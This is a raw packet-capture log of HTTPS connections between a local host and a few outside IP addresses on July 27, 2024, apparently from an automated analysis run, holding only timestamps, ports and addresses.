Jul 27, 2024 07:30:22.642242908 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.642395973 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.670552015 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.670599937 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.670643091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.670651913 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.670811892 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.676142931 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.714360952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714381933 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714437962 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714447975 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.714464903 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714498043 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714498997 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.714514017 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.714637041 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714680910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714694977 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.714705944 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.714742899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.715626001 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.715663910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.715696096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.715704918 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.715718031 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.715734005 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.715770960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.715815067 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.715832949 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.715840101 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.715872049 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.716582060 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.716619968 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.716645002 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.716651917 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.716681957 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.726941109 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.726999044 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.727025986 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.727032900 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.727081060 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.740648031 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.740695000 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.740722895 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.740731001 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.740884066 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.750523090 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.761605024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.761646986 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.761683941 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.761689901 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.761847019 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.783018112 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.805834055 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.805852890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.805891991 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.805915117 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.805955887 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.805960894 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.805969954 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806018114 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806173086 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806221008 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806231022 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806243896 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806277990 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806298971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806467056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806514978 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806533098 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806538105 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806564093 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806582928 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806863070 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806904078 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806929111 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806934118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.806948900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806962013 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.806984901 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.807971954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.817358017 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.817400932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.817430019 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.817435980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.817464113 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.817471981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.817626953 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.817670107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.817684889 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.817691088 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.817720890 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.817728996 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.852204084 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.852247953 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.852317095 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.852324963 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.852358103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.852376938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.896595955 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.896615028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.896667004 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.896675110 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.896713972 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.896773100 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.896787882 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.896826029 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.896831989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.896846056 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.896869898 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897062063 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897075891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897113085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897119045 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897131920 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897155046 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897500038 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897521019 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897552967 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897557974 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897582054 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897593021 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897896051 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897911072 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.897965908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.897972107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.898016930 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.899991989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.907937050 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.907960892 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.908032894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.908041000 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.908078909 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.908267975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.908284903 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.908328056 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.908334970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.908354044 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.908375978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.942357063 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.942368984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.942445993 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.942454100 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.942495108 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.987329960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987341881 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987421989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.987428904 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987477064 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.987565041 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987579107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987618923 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.987626076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987663031 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.987907887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987921000 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987957954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.987962961 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.987977028 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.988003016 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.988303900 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.988322973 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.988367081 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.988373041 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.988384962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.988409996 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.988701105 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.988714933 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.988754034 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.988759995 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.988770962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.988795996 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.990437031 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.998683929 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.998698950 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.998872995 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.998878002 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.998924017 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.999077082 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.999093056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.999144077 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:22.999149084 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:22.999188900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.033211946 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.033226013 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.033303976 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.033312082 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.033512115 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078016996 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078033924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078130960 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078140974 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078300953 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078352928 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078393936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078411102 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078419924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078444958 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078453064 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078656912 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078668118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078711033 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078717947 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.078742981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.078752041 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.079015970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.079027891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.079077005 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.079083920 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.079128981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.079423904 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.079441071 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.079498053 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.079504967 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.079543114 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.089549065 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.089564085 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.089639902 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.089648008 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.089799881 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.090009928 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.090023041 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.090082884 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.090090036 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.090137959 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.124002934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.124017000 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.124222040 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.124229908 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.124274015 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.168752909 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.168772936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.168864012 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.168869972 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.168917894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.169301033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169313908 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169368982 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.169374943 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169414997 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.169603109 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169617891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169660091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.169666052 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169693947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.169701099 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.169838905 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169852972 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169900894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.169908047 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.169948101 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.170008898 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.170032978 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.170085907 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.170092106 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.170133114 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.181096077 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.181128025 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.181190968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.181197882 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.181236982 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.181257963 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.181396008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.181396008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.181396961 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.181405067 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.181447029 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.184845924 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:23.185013056 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:23.185091019 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:23.199502945 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:23.199548960 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:23.199636936 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:23.199654102 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:23.215003967 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.215025902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.215099096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.215106964 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.215151072 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.259743929 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.259759903 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.259840965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.259849072 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.259897947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.260155916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.260169029 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.260226011 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.260235071 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.260279894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.260576010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.260591984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.260646105 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.260653019 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.260694027 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.260957003 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.260976076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.261020899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.261029959 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.261070013 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.261540890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.261555910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.261611938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.261621952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.261662960 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.265016079 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.271626949 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.271641970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.271713018 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.271720886 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.271763086 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.272141933 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.272177935 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.272216082 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.272222996 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.272238970 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.272263050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.304353952 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:23.304408073 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:23.304513931 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:23.304927111 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:23.304960012 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:23.309045076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.309056997 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.309122086 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.309129000 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.309171915 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.354489088 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.354502916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.354590893 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.354598045 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.354640961 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.354796886 CEST	443	51812	185.149.100.242	192.168.2.5
